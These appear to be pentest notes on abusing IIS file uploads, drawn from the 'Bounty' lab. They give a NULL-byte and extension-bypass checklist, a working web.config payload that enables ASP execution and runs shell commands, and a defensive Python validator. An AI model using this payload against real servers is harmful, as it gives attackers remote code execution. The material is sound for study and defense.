IIS Server File Upload

Developers can make directory-specific configurations on IIS servers using a web.config file.

<staticContent><mimeMap fileExtension=".json" mimeType="application/json" /></staticContent>

Web Config file

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

With a web.config file, you can control:

  • Database connection strings.

  • Error behavior.

  • Security.

web.config files are XML documents.

.config is not an extension like .html or .txt

Checklists

Try uploading a file with .aspx or .asp extension

If that doesn't work, tamper with the extension using .jpeg or .png

Then try to insert a %00 (NULL byte) => shell.aspx%00.jpeg

Bounty HTB IIS File Upload

We could insert our aspx code at the end of our .config file.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!-- Our actual aspx code starts from here -->
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")			' Executes shell commands
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->

This is another way to trigger our exploit and get RCE.
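
From the defender's side, an upload handler can reject the filenames in the checklist and inspect any uploaded .config file for the settings shown above. The following Python check is an added example, not part of the original notes; the function names, finding labels and the sample input are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET  # for hostile input, prefer a hardened parser (e.g. defusedxml)
from urllib.parse import unquote
BLOCKED_EXTS = {".asp", ".aspx", ".config"}  # extensions named on this page

def check_name(filename):
    """Flag the filename tricks from the checklist: script extensions and %00."""
    findings = set()
    decoded = unquote(filename)
    if "\x00" in decoded:
        findings.add("null-byte")
        decoded = decoded.split("\x00", 1)[0]  # name as a truncating API sees it
    if {"." + p for p in decoded.lower().split(".")[1:]} & BLOCKED_EXTS:  # every component
        findings.add("blocked-extension")
    return sorted(findings)

def check_config(data):
    """Flag web.config content that enables script execution in its directory."""
    findings = set()
    text = data.decode("utf-8", errors="replace")
    if re.search(r"<%.*?%>", text, re.S):  # ASP block anywhere, also after the root element
        findings.add("asp-block")
    end = text.find("</configuration>")
    xml_part = text[: end + len("</configuration>")] if end != -1 else text
    try:
        root = ET.fromstring(xml_part.encode("utf-8"))
    except ET.ParseError:
        return sorted(findings | {"unparseable-xml"})
    for handlers in root.iter("handlers"):
        policy = handlers.get("accessPolicy", "")
        if "Script" in policy or "Execute" in policy:
            findings.add("handler-access-policy")
        if any(a.get("scriptProcessor") for a in handlers.iter("add")):
            findings.add("script-handler-mapping")
    for rem in root.iter("remove"):
        if rem.get("fileExtension", "").lower() == ".config":
            findings.add("unblocks-config-extension")
        if rem.get("segment", "").lower() == "web.config":
            findings.add("unhides-web-config")
    return sorted(findings)

# Constructed sample: same structure as the file above, with a harmless ASP block.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
<handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" scriptProcessor="asp.dll" /></handlers>
<security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security>
</system.webServer></configuration>
<!-- <% Response.write("x") %> -->"""
```

Any finding from `check_config` on a file arriving through an upload form is grounds to reject it; a benign fragment such as the `staticContent` example near the top of the page produces none.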
